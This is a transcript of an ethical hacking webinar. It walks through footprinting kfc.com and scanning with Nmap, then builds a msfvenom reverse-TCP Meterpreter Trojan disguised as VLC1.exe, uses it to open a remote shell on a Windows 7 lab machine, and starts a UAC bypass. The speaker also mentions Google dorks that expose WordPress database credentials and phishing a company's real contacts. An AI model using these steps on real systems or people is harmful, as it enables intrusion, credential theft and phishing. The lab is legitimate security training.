Uh, Good afternoon, everyone. You able to hear my voice?
Yes, yes, we are able to hear.
Okay, done. Good afternoon, everyone. In this today's session, will our topic is how actually hacking works. Before that, we need to know that what is hacking, ethical hacking, a basic introduction. Before coming to start session, I will introduce myself. Uh, I am Vishwanath. I'm a certified ethical hacker and cybersecurity researcher and trainer, and a founder of eHacking for All. And my coming to my blog, those are my blog details. If you want, you can go through that particular thing. And so here I'm going to explain you about how hacking actually works and what is the process behind that hacking, how it will be done. Okay. So in this, you can expect less slides because I'm going to concentrate mostly on a practical session itself, and there will be a less slides. It's almost around a 10 slides itself. That's it. So we'll going further in our session. We'll go with everything will be in a live and a real time practical itself. Okay. Before that, the basic thing, what is hacking and how many types of hackers and what is the hacking process you need to know. So in this today's topic, so we are going to cover all these topics in our session. The first session, which we are going to start with the basics of hacking, then next is the footprinting, and then scanning module. Okay, like everything will be in a real time scanning module, how you can do scanning modules. uh, okay. So real-time scanning modules will be going to be done over there on network scanning tools with network scanning tools. Once we're done with these things, then we'll go with the live sessions on how to hack a system with a Metasploit. Means with a Kali Linux machines, how we are going to use Kali Linux machine to hack a virtual machine with is of Windows 7. How to hack that thing? I'm going to show you that. And apart from that, it's an make it as a additional add-on like bypass authentications of a web application, like how hackers are going to hack a web applications without username and password of a DB. Okay, without username password of administrator panel, how they can log in into a particular web application. So all these we are going to start with these sessions. Okay. So chalo, we're going to start with a session on basics of ethical hacking. Is nothing but what is hacking. So you all know about like security. I think you are all about to know about security, but just a basic thing. What is hacking is nothing but the process of attempting to gain unauthorized access, successful unauthorized access to a computer resource or a network resource, anything which is not ours, on any unauthorized access. That is called hacking, right? What are the process you are going to follow to hack up unauthorized access? That comes under hacking. So here what happens is there are two types of hackings are there, like hacking and ethical hacking. The name only tells, like our webinar is on ethical hacking right now. So the difference between hacking and ethical hacking is a simple thing. The name only tells you that ethical means you need to follow some rules and some protocols to make that particular hacking. So what happens is a normal basic person, when a person like we all heard about news, right? Recently Zoom was done, Zoom username password was leaked into dark web and all those things. Even our loan banks loan issues are also going on right now. So that comes under criminal activity, means unauthorized access, and they are going to get your credentials and they are going to use it in a some other way. That comes under criminal activity. But when it comes to ethical hacking, with a permission, we are going to test that particular network and computer resources with some protocols, and we are going to write a report to that particular person that there is a loopholes or a bugs or find out on that particular network or a particular machine. So you need to pass that. So that is a job of ethical hacker, and a normal hacker, he won't report that, he will exploit that particular bugs. That is the main difference between a normal hacker and an ethical hacker. Okay, so the same thing which I have shown you over here is the same thing, right? A hacker access computers or a system network without authorization, that comes under a criminal activity, he breaks the law. But when it comes to ethical hacker, he performs the same activity but with owner's permission. That comes under ethical, means he has to follow some protocols. And those will be employed by a companies, and those are called as penetration testers. Okay. See, if you want to ask me any questions or anything, you can ask me it in a chat. Okay. I think someone is not going. Are you able to hear my voice? I think someone is not getting my voice.
Hi, the voice is clear and the questions and will be asked out only in the end of the Q&A sessions as
Then it's fine.
as this will be recorded and uploaded on the YouTube.
Sure, sure. Okay, done. So, if you have any doubts, you can ask me in a QA sessions. At the last 10 minutes, we'll go into do with the QA sessions. You can ask me over there. Okay. So, and one thing which I want to know that all are ethical. You want to become an ethical hackers and everything. So, I have doubt that, see, when you learn any course which is related to a Java, you search for a Java developers job designation. When you learn any C programming, you search for a C developers. Or if you learn any cloud technology which comes under AWS or Azure or some other thing, you'll search for a designation with the name of cloud engineer, right? But here, whenever you learn a course with the name of ethical hacking, but you won't find any designation with the name of ethical hacking. Apart from ethical hacking, they are going to give you a designations with the name of cybersecurity analyst, cybersecurity consultant, or penetration testers. All other designations are going to give you apart from this particular name. Okay, but when you go for skills, they are going to mention that ethical hackers. Okay, CH, certified ethical hacker, but they are not going to mention this particular name in designations, because when you comes because why I'm going to talk to a general thing is, when you go for any technical discussions or when you go for any interviews or some other things, they are going to ask you first test your general things like general knowledge. So why they are not going to prefer ethical hacking? The word hacking or a hacker word is not going to be mentioned in designations, means that comes under offensive word. So you should never use offensive words in a designations. So that's the reason they are not going to give you a designation with the name of ethical hacking, but they can give you a name of ethical hacking or certified ethical hacker in a skill set. So that is the main the designation they are not going to give you. Okay. When you go for a companies, if they're going to employ for that particular company, they are going to call it as a penetration testers, because you are going to test a particular network or a particular web website or but anything you are going to test on a security side modules, and you are going to write a report to a particular department who is the responsible. So those are called penetration test and penetration testers. Those are called penetration testers. Okay. For these things, you need to follow some process. For everything you need to follow some process, right? So in the hacking also, if a criminal hacker or a normal ethical hackers, he also does the same thing. He has to follow some protocols, he has to follow some rules. For that thing, there is a hacking process you need to follow. It involves in 5 stages. The first stage, whatever you are going to see here, is the footprinting stage. Okay, this is a footprinting stage, means nothing but information gathering about a particular target. The target might be anything, like it's a website or a network, computer network, or a system or a mobile phone. Anything can be a target. So first you need to do footprinting. Without footprinting, you can't do hacking. So means information gathering about a particular target is called footprinting. Once you're done with this footprinting, I'm going to show you how to do footprinting in online about a particular website. Okay. The next session will be on that thing only. Once you're done, collection of information was done with everything, then the second stage you are going to do with the scanning module. Okay. The scanning module here, what they are going to do is, based on information what they got information, based on the particular information, they are going to use some tools, network security tools, and they are going to scan that particular target to find the like port numbers. What are the port numbers which are available on the network? Okay, is there any architecture of a OS? All those things, like which is collect information related to a network level. So that comes under scanning module. And apart from that, they are going to get the information about a bugs, like if there is any vulnerability, the scanning tool will going to tell you that there may be a possibility of a bug, but they won't give you 100% assurance. We are going to test that particular bug based on a scanning report, and we need to confirm that whether it is correct or not, because it may be a 50-50 chances. Okay. So the manual confirmation is very, very important in this particular ethical hacking. No, you should not trust on 100% trust on tools. Okay. The tools are going to use it for a time saving purpose actually. Okay. Then next one is enumeration mode, the third phase. The third phase is nothing but whatever the information we gathered from a food printing and a scanning module. The third stage is we are going to launch attacks, launching of payloads. That comes under enumeration. It means whatever the vulnerability we found, based on that particular vulnerability, we are going to launch attacks and we are going to test that whether this is possibility is there or not. For example, if you take a website, so you are going to test that particular website whether outsiders can hack that particular website through any possibilities are there or not. So the enumeration in mode, they can be a payloads. Payloads can be a software or a piece of a code, whatever you are going to use in a particular hacking. That comes under enumeration mode, means launching of attacks. And the fourth stage is attack and gaining access. Means if the attack is successful, then you are into a fourth stage. You are into a website or a network, and whatever the criminal activity, if a criminal hacker, what he is going to do is he's going to modify details or he's going to delete the data or some other thing. But ethical hacker job is to only end at fourth stage. Means whether it is success or a failure, he has to write a report and he has to report that thing. But a normal hacker, he won't report that. He will exploit that and he will do modifications. So that is the main difference. Like ethical hacker follows only 1, 2, 3, and fourth stage. But in fourth stage, whenever he logins into a particular website, he will log out and he will write a report with the taking of a screenshots and everything. That comes under penetration testing report. But a criminal hacker, what he's going to do is he's exploit that thing and he's delete everything or modifications, whatever he want, he will do. So fourth stage. And after that fourth stage, then the escalating of privileges means if you are logged into a normal user, escalating privileges is nothing but acquiring administrator privileges of that particular network or a website. And once you're done with that, covering of tracks is nothing but once you're done with your job and everything a hacker does with that particular job, he's going to delete all log files because there should be no proof that he has entered into a website or a network. So he's going to clear all the log files. And before leaving a particular network, he is going to create a backdoors, nothing but a trojans. You can call it as trojans, malwares, anything, spyware, anything. So he's going to leave that particular backdoors in a particular network for further for the next time he want to enter into particular same network, he can directly enter through that particular malware. He doesn't, I mean, he can save this all this footprinting, scanning, and enumeration. He can directly enter through that particular backdoors. That is a process right now every hacker should follow to test any network or to test any website. Okay, this is the thing we are going to follow. So first thing, the we'll go with basic part is done, like a basic introduction. Then we'll go with the live practical sessions, whatever we do. Okay, the first stage is a food printing. So food printing stage is nothing but food printing is a process of collecting as much as information possible about a particular target through online. Okay, and attackers gather publicly available sensitive information about a particular target. So the definition only tells you food printing. Food printing means nothing but we are going to gather about a target. So how can we gather information about a particular target? So there are so many resources are available. Google is giving so many resources. And one thing you need to know, Google hacking means we are not going to hack a Google server. Every hacker is going to use Google as a tool. Google as a tool to gather information. So that is called Google hacking. So here I am going to show you how to collect the information about a particular website and how to gather a sensitive information which is publicly available by mistake of a particular organization. See, whenever a website was developed by a developer, he's going to write a conference files and everything, right? But here what happens is if he doesn't make that particular files privately and is publicly visible that particular sensitive information, we can gather that information through Google. So I'm going to show you that one also. Okay, so first we'll go with the footprinting of websites. We'll start our practical session from here onwards. Okay, the theory part will be very less, sorry for that. So we'll go with the live sessions. Okay, so we'll go with the Google first because Google has everyone's favorite search engine is Google, but hackers search engine is not a Google. Okay, they are going to use Google as a tool. That's it. So I'm going to show you some websites. Yesterday, if you go through that particular session, they have given you about OSI in frameworks, means information gathering. The same thing here also, we are going to do the same thing, information gathering about a particular target. So here, I'm going to use a website which is called whois.domaintools.com. Okay, whois.domaintools.com. This is a website we are going to use to gather information about a particular website. Okay, or any IP address, anything. So here first you need to know about a particular website IP address. How to know website's IP address? Say simple thing. When you go for a command prompt, there is a command which is called ns lookup, means name server lookup. Here what it is going to do is it is going to convert a domain name into IP address and IP address to domain names. Okay, so here if I want to know the IP address of a, for example, we'll go with KFC. Okay, kfc.com. See what happens. The kfc.com is this is the website name, domain name. So it is converted into IP address, because IP address only routers and switches and any networking devices will understand only IP addresses, not domain names. So we are going to get the domain name of that particular website from NS lookup. So you can use this IP address to gather the information. Otherwise, you can use this particular domain name also. That's not a big deal. Okay. See, if I use kfc.com, see what happens. It is going to gather the information about a particular website. So what is the website name? KFC. Okay, this is the website screenshot history. Whatever we are seeing right now here, you can see the history of that particular website. kfc.com. So we'll see where KFC is in right now. It's online. So how to know that whether it's in online or not? Just pinging by kfc.com. Okay, the command is ping.com. So ping domain name. So it is replying back with that particular IP address. So it is in live right now. Okay. Then we'll go with the details of a who's records. So the registered name is web admin, and the next registered organization is Yum Brands. Means actually we know about KFC. Everyone knows about KFC, but the main parent company of a KFC is the registered company is Yum Brands. Okay, that is the main thing, and where it has registered in US, and restaurant where he has registered about the particular URL and where they are what's they are going to get the services from this particular restaurant. Okay, and from here we are going to get that information when it was launched, the first website 1997. Means in 1997 July 13th the website was seen on internet. Okay, and when it is going to be expired, that is on 2025 July 12th. Okay, and when it is updated, it is 2019 June 7th. Means something they have changed in a website or some modifications they have done on that particular website regarding like a coding or some other things. Okay, so here this is a thing you are going to get that information. And what are the name servers? They are going to use these name servers. Okay, so for every country they are going to use the different name servers. Okay, so these are the name servers they are going to use for that particular domain. Okay, then what is the technical contact information? Means who is going to maintain this particular website, and what is a, if you want to contact a particular person, that is the technical information of that particular website. So this is the address of a particular technical contact information. This is the email ID and this is the phone numbers they are going to give you. So this is the tech contact. Okay, and this is the IP address of a particular hosted server. Means this IP address is nothing but wherever it was hosted that has a dedicated server, and we are going to get that particular the IP address of a server. Okay, that is a dedicated server, and this is the IP address of a dedicated server where it was hosted. And the IP location, this IP address was located in Cambridge. Okay, so here we are going to get the IP location also. And once you're done with this, you can see the next level. See, this is the basic information whatever we gathered about a particular KFC. This is a basic information. But if you want to go for further investigation, if you want more information about a particular website, so you can go with some other websites are also available. Okay, you can go with that. I'm going to show you that. See, there is another website which is called netcraft.com. netcraft.com. So this website is it is going to give you the information which is related, more information which is related to kfc.com. along with the particular technology, what technology they have used to build that particular website, and what is the name servers, extra name servers are there, what is the RSA encryptions, any certifications are there, all those things we are going to gather that particular website. So HTTPS, the format we are going to use here is HTTPS www.kfc.com. If you directly type kfc.com, it won't accept. Okay, just please click on go here. See what happens here. Yeah, we got it. It was first date seen is April 2016. Okay, well and good. And primary language English, and the site network. When it comes to a digital network information, the kfc.com, and domain register corporatedomains.com. They have taken this particular domain from this particular domain register. Okay, and what is the name servers organization is the same thing. Who is dot corporate domain, because it was hosted in the same domain, so they are going to give you the name servers from this particular domain itself. And the organization brands, and we are going to get that full address of that particular head office. We can make it as, we can say it as a head office. Okay, and these are the name servers. Okay, and this is the IP address of a particular website. And then hosting country, it is in Netherlands. Right now it is in Netherlands. Okay, and reverse DNS IPv6, they're not using IPv6, but they are going to use the reverse DNS. Okay, and when you come for IPs, IP delegations means which type of IP addresses they have till now they have taken from which group of IP addresses they have taken, means that you can see that history IP delegation history. Okay, right now they are using 23 dot series, right? So 23 dot series they have used, and previously they have used 23.32 series they have used. So right now it is the IP address, it is in Netherlands they have using. Okay, and this is a description where they are going to get that particular ISP providers and all those things. And when you come for SSL, means nothing but secure layer, like HTTPS, secure layer. So when you come for secure layer, you are going to get that certificate. So from there, which type of algorithm they are going to use, and the issuing organization, they have taken an organization, the SSL certificate from this particular company, DigiCert Inc. Okay, issuer common name is GeoTrust. Okay, and this is a web application. You all know about this web application. And these are the alternative names for KFC, means you can make it as a subdomains. You can call it as a subdomains of that particular website. Okay, these all are the domain names. Okay, domain names, DNS names of that particular website. And when you come for validity period, okay, this is a validity period of that particular certificate, SSL certificate. Okay, and let's see here they are using public algorithm key, which is of RSA encryptions, and certificate hashing is there, hash number is there. Okay, and public key is also available here. Okay, and say signature, the signature algorithm is SSH 256 algorithm, means they are going to use this particular encryptions to get that to make that data secure with this particular algorithms. And this is the date, like when it was going to be expired and when it is going to be generated. Okay, and the version number. So when it comes for other things, see hosting history. The hosting history was it is on 1st March 2016. It was hosted with this particular IP address with a Linux based OS, and this is a web server they are going to use. And right now it is changed to in 2018 March with this particular IP address with Linux machine and the same thing. But here it was version was changed 1.6.2, and here 1.12 is there, means updated version. Okay, here 0.59 is there and 0.60 means its updated version is there. And right now they are using this particular IP address itself and this particular NetBlock owner. And when you come for this, go down, site technology they have used, which type of technology they have used and everything. Fetched 2 days ago, means it is fetching only 2 days back. They have fetched this particular information. Okay, this is the information we are going to get that particular information. Even if you go for any website, you can get the information of PHP, HTML, which type of technology they have used. Everything will be going to be displayed in this particular Netcraft website. Okay, and once you're done with this, we'll go with some other Excel. See, you can ask me that what is this hell of information? What can I do with this particular information? You will get it out, right? But whenever the hacker, if you want to become a hacker, if you want to become a security analyst, the first stage is footprinting, because most of the 80 to 90% success rate will be from footprinting itself. See, we can easily send to email to a particular KFC who is the contact person. We can send an email, forging emails in the name of that particular net blocker owner address, right? So we can give this particular information, and we can send a phishing mails to them to get the username and passwords of a domain credentials or anything. So all these can be done to do phishing attacks. So this is the main advantage of this particular information gathering. And you can use that particular IP addresses and all those things also in next scanning module also. Okay, I'm going to show you that scanning module also. Apart from this, the one thing which we have done is whose domain is done and netcraft is done. Then Google hacking means sensitive information, right? I'm going to show you how Google is going to get the sensitive information about a particular any website, common website. See, if I'm going to target any WordPress website, for a development of WordPress website, they are going to just drag and drop that particular things, plugins and everything. They are going to create a website without web development knowledge. So we can easily get the information, sensitive information about a database table names, database username and passwords also. So further thing, you are going to use Google. See, example, I'm going to show you that in a real time. See, for example, in URL, see here it is there, wp-config.txt file means configuration text file. So WordPress configuration text file. If this is publicly available in a particular website and the user doesn't know that it is publicly available, a hacker can use this particular information, sensitive information, to hack their particular network also. So see here what happens is the first website, whatever we are saying is, see what happens. See, this is a configuration page. Actually, it should be in a private mode. Okay, it should not be displayed to users. But here the configuration is developed, the PHP file, and here we can see that username and passwords and all those things, right? DB username, passwords, and host name, everything is there, right? So you can easily get the DB username and password, and you can hacker can easily hack that particular databases also. So that is the main disadvantage. It is the mistake of a developer as well as an organization who is not going to check that particular website properly. So our job is to find these type of vulnerabilities, and we are going to write a report to that particular who is the responsible person. Okay, so that is so here what we have used is Google as a tool, not as a search engine. Okay, so that is called Google hacking. So the next thing is we are going to use OSI int frameworks regarding to that particular website information gathering. OSI int framework. See, the same thing yesterday, whatever thing we done. Here is a collection of all the websites which are at one place. You can go for these websites and you can get the more information. See, regarding domain name, if I go with the domain name, see if I want to know the subdomains of a particular website, so I can go with this particular website. See, find subdomains.com, right? So just if I type kfc.com, kfc.com, see what happens. So it is going to list you all the subdomains of the particular website, and apart from that, it is going to get that A records also, what is IP addresses and all those things, right? See, subdomains. Say they are going to use domain with the name of mail.protectionoutlook.com, kfc.com. Okay, so all domain names and information which is related to that particular website. Okay, SPF records. And these all are subdomains. 43 subdomains are there with the name of KFC. And see, this is access denied, means only authorized access can users can only access this particular domain name. And this is the DNS names. Okay, see, all these are the invalid URLs. Some are access denied are there. Okay, so it is based on the particular websites. So you need to get the information of that particular thing. So this is the information you can get it from OSI in frameworks regarding to domain names, subdomains, and reverse IP lookup, who is records. See, here I have used only one website, who is domaintools.com, but here there are so many websites are there. You can gather more information from many websites. Okay. Apart from this, I'm going to show you one. Wait, I want to show you there one thing. So here what we have done is OSI in frameworks and footprinting was done, right? Even you can go for Wikipedia and you can get the information about a particular publicly available information. about KFC. So hackers are going to use this one also, KFC and all those things. So they are going to get the information about a particular about us page and who is the subsidiary, all those things, right? Headquarters, where are the headquarters, who are the key people, and you can get the products, what are the products they are, what are the key roles they are using. I mean, what is the revenue of that particular thing. So all these information is going to be used for a phishing attacks mainly. And once you're done with this footprinting module, then we'll go with another module which is called scanning module. In this scanning module, we are going to use, scanning, network scanning is refers to a set of procedures for identifying host, port numbers, and services in network. Means here what our target is in scanning module, we are going to find the live host names. Okay, host names, IP addresses, what are the open ports, and what is the operating system, okay, Linux or Windows, and all those things. For these things, I'm going to use a tool which is called Nmap tool. So in Linux, they are called as Nmap tools, and the same thing, the same thing is in graphical user interface is also available. That the name is called Zenmap. That's it, Nmap or Zenmap. The both things the same thing. Okay, and apart from this, this is another website which I'm going to show you, Showdown website, to gather information about a particular web servers. Okay, directly. So first we'll go with the Nmap. So I'm going to use Kali Linux machine to use this Nmap tool. See. No, we can't. For if you want to do network scanning, you should be in the same network. If you want to do scanning for a web application, there is no need to do. There is no need to do in a same network for websites. But for network scanning, it should be there. Okay, please use Zenmap. Okay, Zenmap is a very easy way, simple thing. When you go for this, here you can find the Zenmap. Otherwise, if you don't know that where is Zenmap, just search for Zenmap here in Kali Linux machine, and Zenmap as a root, no problem. So this is a graphical user interface. The same thing in Nmap, we are going to use commands, but in Zenmap, nothing. We are not going to use commands. Just we are going to use only buttons. By clicking on a particular buttons, you can get that. See, if you want to open a terminal, see, you can go for this. Okay, Nmap. If you type Nmap, automatically Nmap will be opened over here. And here you can find all the options. Means these are the parameters they are going to use for scanning techniques. Okay, so these are the things you are going to know about this particular thing. Okay, I'm going to scan a particular target, which is already demo website. I'm going to use that because we can't do scanning on a real-time website because it's in a live session. And one thing you need to know that footprinting is not a crime. First thing, footprinting is not a crime. That is not a crime. So you can gather any information which is related to a footprinting. But scanning, when you do scanning module, they are going to get your IP addresses in there, logged into their firewalls. So that's why you need to be very careful to do scanning without particular authorization. You should not do any illegal things like scanning and enumeration modes. You should not do anything. Okay, see here I'm going to use a website which is called scanme.nmap.com, the demo website of Nmap. Okay, for this thing here the target is this one. If you know the IP address, you can get for IP address also. If you don't know the IP address, you can go with the websites. But first I'm going to show you with the websites, and here you can see profile sections, intent scan, UDP scans, TCP port number scanning. Everything is different scanning modules are there. And if you want to do all scannings at a time, you can go for a slow comprehensive scan. Means it takes so much of time, around 5 to 10 minutes of time to scan all the modules. If you want only a single module, if you want to scan only a TCP ports which is there in a particular website, you can scan with this particular thing. Here you can see the commands. So whenever you use this particular commands, it automatically changes. See it was changed, right? Again the same thing. If I go for this ping scan, it automatically changed, right? The same command you can use it in a command prompt. That's not a T. That's not a big deal. So just I'm going to go with a first intent scan and scan report. And here you can see the scanning was done. Scanning was running. See details. Here it is running. So what is the IP address of that particular website is, this is the IP address. Okay, and here it is scanning for 1000 ports, and here we are going to get the port numbers which are publicly available, that is port number 22 TCP ports, and and 80 is a port number, 9929 is a port number, and 31337 is a port number which is publicly available. Okay, and once you're done with this, it's still scanning. We'll try. It's still scanning. It is initializing OS detection, but it's not getting the OS information. Okay, not a problem. Because it is an intent scan, it's a basic scan, whatever we are using here. But when you go for a slow comprehensive scan, you can get a more information which is related to a OS architecture also. I'm going to show you that slow comprehensive scan with my network because I am using here. See, it was done. See. See, port number 22 is used for SSH. The service they are using in port number 22 with a TCP port, which is called SSH. Okay. Can Angry IP scanner, you can use that Angry IP scanner only for local systems, only to know the IP address which are in live, and as well as the MAC address of that particular system. That's it. But here it can't be used for web applications. But ZenMap can be used for both web applications as well as a local LAN network also. That can be done. Okay, and they are going to use Ubuntu Linux. Okay, and this is the key SSH keys, RSA keys. And 25 port number is filtered port number, means SNMP. See, what is the difference between open port and filtered port is, open port, anyone can access that particular port number. But filtered port is nothing but only authorized persons can use that particular port number through some credential. That is called filtered ports. Okay. So open ports, it is available for public. Here 80 is a port number which is open for a HTTP, and they are running as a web server Apache Tomcat in Ubuntu. Okay, then what are the supporting methods they are using is get method, post method. These are the methods they are going to use in a supporting methods to get the information and to post that particular to take a request and to give a reply. And aggressive C, Linux OS, maybe it is in Linux based OSs. Okay, so Linux 2.6.32 aggressive OSs guessed, and 9929 port number is used for nping, and the TCP port which is used for TCP wrapped. Means these are different services they are going to use with this particular port number. And this is a trace out, means if whenever you use a particular scanme.nmap, it automatically teaches to destination with this particular scan. Means in how these many servers it is going to cross, and finally it reaches to this particular nmap. So these are the results, and we are going to get the IP addresses of the particular servers also, intermediate servers also. Okay, all these are the information which is related to a nmap. Okay. Okay, regarding sublister, you can go for a sublister for finding a subdomains of a website. Okay, if you want to know subdomains, no need to go for a sublister also. If you are a technical guy, then you can go. If you are non-technical person and if you don't want to use a sublister, you can go for another website which is called virustotal.com. There is a website to know the subdomains. This is a website. Here you can paste that particular search, go for search and KFC, kfc.com. Just enter it, and here you can find the relations, and here you can find the subdomains of that particular website. Everything is there, and with IP addresses. Even the same thing will do the sublister. That's not there. And so this was scanning module. Whatever which have done is a scanning module, and the showdown is the another website. Same thing. We can get the IP address and domain names, and what are the port numbers which was opened. Everything can be done here. See, showdown.io. Total overall servers are 8,913 servers are there overall world. In this, United States have 4,000 servers, 4,000 plus. So here they are using Microsoft Azure, and this is the IP address of that particular website. I mean server. Okay, and it was hosted in United States and Washington. If you click on this particular thing, see, this is a web server information. They are using port numbers which are publicly available: 443, 4443, and 8443. So 443 is used for HTTPS, and 4443 is used for which one? Like HTTPS simple U, and another one they are going to use for HTTPS. So they are using Apache Tomcat server with the JSP engine. And here you can find the certification details also, like serial number of a certificate, SSL certificate, and expiry, validity, and everything, right? And here you can get the public key also. The same thing, public key, RSA encryption public key. And from here you can get the certificate of a particular website also. See, certificate, it can be downloaded, certificate can be downloaded from this particular link. If you go for this, if you open this particular link, you can download that particular certificate, SSL certificate of a Microsoft also, security certificate. You can download that. So these are the things we are going to do in a module, scanning module and a footprinting. So is that everything clear, right? So we're going to go for a live sessions now. These are the practical live sessions. Right now we are going to show you Metasploit, how to hack a system, how to hack a system from Kali Linux machine, network hacking. Okay, see. So here what I'm going to do is I'm using my virtual machines. Here I'm using my virtual machines. This is the Kali Linux machine, and this is also a Windows machine. Now I'm going to hack this Windows machine with this Kali Linux machine by using a tool called Metasploit. Metasploit is a tool where it has inbuilt all payloads and exploits are available in that Metasploit is there. We are going to use that particular modules and we are going to generate a Trojan, RATs, RAT, remote administration tools, RAT tools. So once we generate our own RAT tool, we are going to send that RATs to a Windows 7 machine. And if a person executes that particular file, just click on the particular file, we'll get a remote session. Means here, no need to get the IP address of a victim also. Okay, in most of the things we are going to use for a victim IP addresses to connect to the particular system. But in Metasploit, no need to get an IP address of a victim system. It automatically, whenever a user clicks on a particular virus file or a Trojan file, it automatically connects to our server, Metasploit server, and we can easily access that through backend. So the user doesn't know that it was hacked and it was connected to a hacker also. So we can execute that application from here itself. We can give give remote commands also. See, to execute this remote exploitation Metasploit, I'm going to use a terminal. In Windows, we call it as a command prompt. In Linux, we call it as a terminal or a shell. So this is a shell. Okay. Here, what I'm going to do is, first of all, I'm going to create a Trojan, first of all. So for creating of a Trojan, we are going to use a framework, which is called Metasploit framework. Okay. So for the thing, the command we are going to use is MSF Venom, means Metasploit framework Venom. Venom in general terms, what we call it as poison, right? Venom means. So it's the same thing. We are injecting a malicious code into that particular file. One file we are going to generate that contains a malicious coding. It is going to give you remote access of a victim. So MSF Venom -p, nothing but P is for payload, means which payload we are going to use. It contains already inbuilt payloads are there, so you can use that particular payloads. I'm going to show you the payloads in the next thing. Okay, next command. So here -p, and what is the payload which I'm going to use is I'm going to hack a Windows, right? So for this thing, Windows / Metapredator is a session. Whenever user connects to that particular hacker machine, it automatically opens a shell that is called Metapredator session. So for the thing Windows, we are going to go for Metapredator session. From that, we are going to use a technique which is called reverse TCP. Means why we are using reverse TCP connection means it should automatically get the connection to our system, hacker system. That's why we are going to use reverse TCP connection. Okay. Once you're done with this, lhost. Lhost is means nothing but a local host. Okay. Here I'm going to use it in a local host. If you are in a remote location, if you are not in the same location, you are going to use rhost, means remote host. Okay. So here we are going to write an IP address of a hacker. IP address of a hacker means IP address of this particular machine, Kali Linux machine. To know the IP address of a Kali Linux machine, we are going to use a command which is called ifconfig. In Windows, we call it as ipconfig. In Linux, we call it as ifconfig. See here. The IP address is 192.168.0.4. Right? Oh, sorry, 114. Copy this, paste it here, done. Then space L port. So we are going to use a port number which is called 4444. Okay, this is a default port number which is used by a Metasploit. If you want, you can change it to any other port. That is not a big deal. But right now I'm going to use this 4444 port number only. If you don't want to give the port number, it automatically takes 4444. Okay. So then all these information which is giving is ours information, means hacker information only. Okay, till now we not touched any victim information. Okay, then hyphen f. F is a parameter we are using for a format. So Windows accepts only .exe file. So format is .exe, and it should be saved in root folder in desktop and with the name of VLC. For example, we take it as a VLC1.exe because already VLC is already there in my desktop. So I'm going to use VLC1. See, just click on enter. See, it is going to create a VLC1 is creating. So it takes some time, around 10 minutes, so not 10 minutes, just it's take 30 seconds. 30 seconds to 1 minute time to create that particular, it will inject that particular code into .exe file. In meanwhile, we'll go with Metasploit framework. So how to open Metasploit? MSF console. So here we are using MSF console to open that Metasploit framework. Now it takes some time, 2 minutes. Sir, it was created, means VLC.exe is created and everything is done with a 73802 bytes, means 73 KB. I think so, approximately around 73 KB. I think is that the same thing, 73 KB. Yeah, I think it's 73 KB, right? So okay, well and good. See, out of LAN, if you want to do out of LAN, you need to have a static IP address with a public IP and static IP address. Okay. So that's why I'm not going to show you remote session remotely. I'm going to show you LAN connection. In place of local IP address, you can keep remote IP address, nothing but a public IP with static IP, public IP address. You need to insert that thing. Okay. See, Metasploit framework is opened here, and in this 541 payloads are available, exploits 1852 exploits are available, all these are available. So here I'm going to use an exploit which is called use exploit multi handler. Sorry, handler. Why we are going to use this particular exploit means we are going to target if multiple machines, for example, the same VLC is installed in 100 machines. So 100 machines are going to connect to this Kali Linux machine. So to maintain this multiple handler request, we are going to use an exploit which is called multiple handler. And once we're done with this, we are into exploitation mode. Then we are going to tell to that exploit thing what are the payload we have used, what are the local IP address we have used, and what are the local port number we have used. We need to tell that to that particular Metasploit framework. So set, we are going to use set payload. What is the payload we have used? Windows slash metadata slash reverse underscore TCP. So, okay, payload was set to this particular thing, and then set lhost means local host. What is the IP address of we have used 192.168.0.114. Okay, lhost is also done. Next lport, sorry, set. We need to write set lport 4444. So everything is set. Now we are going to start our exploit. EXPLOID exploit, right? Exploit -J and -Z. If you type, that is a commands you are going to use. Otherwise, if you go with directly exploit, that's only for single attack. If you want multiple connections, you need to use -J -Z. Okay. So just I'm clicking on enter. See what happened. It is started reverse TCP connections, right? So it is started listening for a connections. It is going to accept a connections, and it is ready to accept a connection from this particular port number. So right now, what we are going to do is, this is the thing we have used. This is the Trojan we have used. Just copy this, and I'm going to send this Trojan file, virus file, to this Windows machine. Okay, to this Windows machine. Okay, now see what happens. Now I'm going to download that particular Windows. VLC1, just copy this. Assume that he has downloaded from internet, for example, VLC has downloaded from an internet through email or anything. And whenever he clicks on that particular VLC, what happens, see here in Linux machine, it automatically started, it automatically established a connection. See, Just if I double click on this, nothing will happen, but the connection will be established to the Linux machine. See, we got a connection. See, Meterpreter session was opened from this particular IP address 119 with this particular port number. Means 49226 is a port number of a Windows. They are going. It is established a connection from this particular IP to this particular IP with this particular port number to this Windows port number. So now it was connected, but he doesn't know what why it has connected, right? So we can control this Windows machine right now. See, if you want to enter into that particular mission, just first we'll go with sessions. How many sessions was established? -L. See, only one session was established and the ID number is 1. See, only sessions -L is the list. So sessions -I means initialize the ID number 1. It is going to connect to this mission. Say Meterpreter session was started, right? So whenever you get a Meterpreter session, means it is now we are into this particular mission and we can get the information of this Windows mission in this Linux mission. See, if you don't know the commands, just click type help button. You'll get the whole command list. Wherever you want, you can do this. See, if I want to get the system information, whether I have connected to a correct system or not, we need to check. So sys info, this is the command, enter. See, the computer is Windows 7 with 32-bit and the computer name is attacker-pc and it is in work group. Okay, see whether we check whether it is connected to a correct machine or not. See, Windows 7 attacker-pc and it is in work group means we connected to this particular machine. Okay, well and good. Now we are going to access this particular machine's shell. Means if you want to open this Windows command prompt in this virtual machine, you can go with that. See, shell. If you type shell button, see, we are into desktop. See, users desktop. Means if you type dir, you will get the information of this particular machine. What are the folders you are having? Everything can be seen over here. And even you can delete, you can do whatever you want. But one thing you want to know is if you want to change the password. See, for example, the password is log. See, I log this particular machine. The password is 123 actually. So it is logged in. If you want to change the password from Linux machine to this machine, so how to do that? See, net space user. What is the username? Attacker. If you don't know the usernames, just netspace user, type netspace user. You'll get all the users who are logged into this particular machine. So I want to change this attacker username, password. So yeah. How can we encrypt all files after getting control? Means are you using? You are talking about a ransomware, right? So that is a advanced level of topic. In this, we can make it as a virus and trojans, malware attacks. We are going to do that encryptions. Okay. So for that, net space. If I want to change the password, net space user attacker, and the password is 123. See, it is access denied because attacker is a normal user. He is not administrator user. So we need to bypass this particular user. Okay, user control means fifth stage means escalating privileges, which I have shown you the cycle. So escalating to do the escalating privileges, you need to do some activity. Just I'm going to show you that particular process where you can get this information tricks. See, just open this page. See. How to bypass UAC. UAC means like user account management. So how to bypass, how can we get the control of a administrator mode? See, for this thing, you need to first exit from this particular shell. Okay, see, what I'm going to do is first we'll go with this. Okay, first we need to exit from this particular machine. Okay, we are into Meterpreter session, then we'll go with a background. The command is called background. Okay, then background session 1 is started, right? Okay, then one session is established in background. So search for, what you are going to do is 